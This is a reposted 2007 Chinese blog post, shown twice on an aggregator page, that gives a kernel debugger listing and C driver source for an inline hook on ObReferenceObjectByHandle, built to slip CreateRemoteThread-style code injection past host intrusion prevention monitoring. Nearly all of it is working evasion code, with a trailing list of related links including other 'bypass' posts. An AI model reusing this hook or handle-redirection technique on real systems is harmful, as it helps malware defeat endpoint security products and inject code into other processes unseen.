bypass HIPS CreateRemoteThread Monitor
来源:互联网 发布:北京外国语大学网络 编辑:程序博客网 时间:2024/05/01 07:39
Author:kruglinski(kruglinski_at_sohu_dot_com)
site:http://hi.baidu.com/kruglinski
date:2007.10.21
CreateThread
+CreateRemoteThread
+NtCreateThread
+PspCreateThread
+ObReferenceObjectByHandle
inline Hook ObReferenceObjectByHandle:
lkd> u nt!ObReferenceObjectByHandle
nt!ObReferenceObjectByHandle:
805bb050 8bff mov edi,edi
805bb052 55 push ebp
805bb053 8bec mov ebp,esp
805bb055 51 push ecx
805bb056 53 push ebx
805bb057 56 push esi
805bb058 57 push edi
805bb059 64a124010000 mov eax,dword ptr fs:[00000124h]
source code :
NTSTATUS __declspec(naked) Trampoline(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
}
}
BOOLEAN EnableHook(void)
{
PBYTE pfnObRefByHandle=(PBYTE)&ObReferenceObjectByHandle;
ULONG uTotals=0;
ULONG uSize=0;
KdBreakPoint();
while(uTotals<5)
{
if(*pfnObRefByHandle==0xe9)
return FALSE;
uSize=Disasm((PBYTE)pfnObRefByHandle,15);//使用的是精简后OllyDbg的反汇编引擎
pfnObRefByHandle+=uSize;
uTotals+=uSize;
}
if(uTotals>32)
return FALSE;
//我很想用lock rep movsb来Copy内存,但不记得同时用lock和rep前缀是否有效
RtlCopyMemory(&Trampoline,&ObReferenceObjectByHandle,uTotals);
{
PBYTE pTramp=(PBYTE)&Trampoline;
pTramp+=uTotals;
*pTramp=0xe9;
pTramp++;
*(int*)pTramp=(int)pfnObRefByHandle-(int)(pTramp+4);
pTramp=(PBYTE)&Trampoline;
*(ULONG*)&pTramp[32-sizeof(ULONG)]=uTotals;
}
{
BYTE Jump[5]={0};
Jump[0]=0xe9;
*(int*)&Jump[1]=(int)&MyObRefObjByHandle-((int)&ObReferenceObjectByHandle+5);
RtlCopyMemory(&ObReferenceObjectByHandle,Jump,5);
}
return TRUE;
}
BOOLEAN DisableHook(void)
{
PBYTE pTramp=(PBYTE)&Trampoline;
ULONG uTotals=*(ULONG*)&pTramp[32-sizeof(ULONG)];
KdBreakPoint();
if(uTotals!=0x90909090)
{
RtlCopyMemory(&ObReferenceObjectByHandle,&Trampoline,uTotals);
return TRUE;
}
return FALSE;
}
NTSTATUS
MyObRefObjByHandle(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
if(ObjectType==PsProcessType &&
Handle==NtCurrentProcess() &&
(
DesiredAccess==PROCESS_CREATE_THREAD ||
DesiredAccess==PROCESS_VM_OPERATION || //用CreateRemoteThread这几个操作是少不了的
DesiredAccess==PROCESS_VM_WRITE
) &&
AccessMode==UserMode &&//防止错误的把内核中的一些操作重定向
PsGetCurrentProcessId()==RemapID)//重定向进程ID相同
{
//修改Handle值
Handle=hRemapHandle;
}
return Trampoline(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
site:http://hi.baidu.com/kruglinski
date:2007.10.21
CreateThread
+CreateRemoteThread
+NtCreateThread
+PspCreateThread
+ObReferenceObjectByHandle
inline Hook ObReferenceObjectByHandle:
lkd> u nt!ObReferenceObjectByHandle
nt!ObReferenceObjectByHandle:
805bb050 8bff mov edi,edi
805bb052 55 push ebp
805bb053 8bec mov ebp,esp
805bb055 51 push ecx
805bb056 53 push ebx
805bb057 56 push esi
805bb058 57 push edi
805bb059 64a124010000 mov eax,dword ptr fs:[00000124h]
source code :
NTSTATUS __declspec(naked) Trampoline(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
__asm
{
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
}
}
BOOLEAN EnableHook(void)
{
PBYTE pfnObRefByHandle=(PBYTE)&ObReferenceObjectByHandle;
ULONG uTotals=0;
ULONG uSize=0;
KdBreakPoint();
while(uTotals<5)
{
if(*pfnObRefByHandle==0xe9)
return FALSE;
uSize=Disasm((PBYTE)pfnObRefByHandle,15);//使用的是精简后OllyDbg的反汇编引擎
pfnObRefByHandle+=uSize;
uTotals+=uSize;
}
if(uTotals>32)
return FALSE;
//我很想用lock rep movsb来Copy内存,但不记得同时用lock和rep前缀是否有效
RtlCopyMemory(&Trampoline,&ObReferenceObjectByHandle,uTotals);
{
PBYTE pTramp=(PBYTE)&Trampoline;
pTramp+=uTotals;
*pTramp=0xe9;
pTramp++;
*(int*)pTramp=(int)pfnObRefByHandle-(int)(pTramp+4);
pTramp=(PBYTE)&Trampoline;
*(ULONG*)&pTramp[32-sizeof(ULONG)]=uTotals;
}
{
BYTE Jump[5]={0};
Jump[0]=0xe9;
*(int*)&Jump[1]=(int)&MyObRefObjByHandle-((int)&ObReferenceObjectByHandle+5);
RtlCopyMemory(&ObReferenceObjectByHandle,Jump,5);
}
return TRUE;
}
BOOLEAN DisableHook(void)
{
PBYTE pTramp=(PBYTE)&Trampoline;
ULONG uTotals=*(ULONG*)&pTramp[32-sizeof(ULONG)];
KdBreakPoint();
if(uTotals!=0x90909090)
{
RtlCopyMemory(&ObReferenceObjectByHandle,&Trampoline,uTotals);
return TRUE;
}
return FALSE;
}
NTSTATUS
MyObRefObjByHandle(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
if(ObjectType==PsProcessType &&
Handle==NtCurrentProcess() &&
(
DesiredAccess==PROCESS_CREATE_THREAD ||
DesiredAccess==PROCESS_VM_OPERATION || //用CreateRemoteThread这几个操作是少不了的
DesiredAccess==PROCESS_VM_WRITE
) &&
AccessMode==UserMode &&//防止错误的把内核中的一些操作重定向
PsGetCurrentProcessId()==RemapID)//重定向进程ID相同
{
//修改Handle值
Handle=hRemapHandle;
}
return Trampoline(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
- bypass HIPS CreateRemoteThread Monitor
- bypass HIPS CreateRemoteThread Monitor
- CreateRemoteThread
- CreateRemoteThread
- CreateRemoteThread
- CreateRemoteThread
- HIPS是什么意思
- Rose Hips
- HIPS实现
- monitor
- Monitor
- Monitor
- Monitor
- monitor
- Monitor
- CreateRemoteThread (转)
- CreateRemoteThread 使用
- experiment:+CreateRemoteThread
- Tibco Courses
- Tiboc Software list
- AWT實現多線程
- Bypass FsdFilter
- 几个速度不错而且可用网上电台
- bypass HIPS CreateRemoteThread Monitor
- 如何创建VPN的拨号连接
- Excel编程——获得Excel中的函数
- C6000与C2000系列DSP之间串行数据通讯的研究与实现
- Bypass RestoreSystem
- VPN基础知识详解
- 基于无线传感器网络的电机运行状态监测系统设计
- SecotrReadWrite
- svn服务器安装配置与svn的eclipse的subclipse插件使用
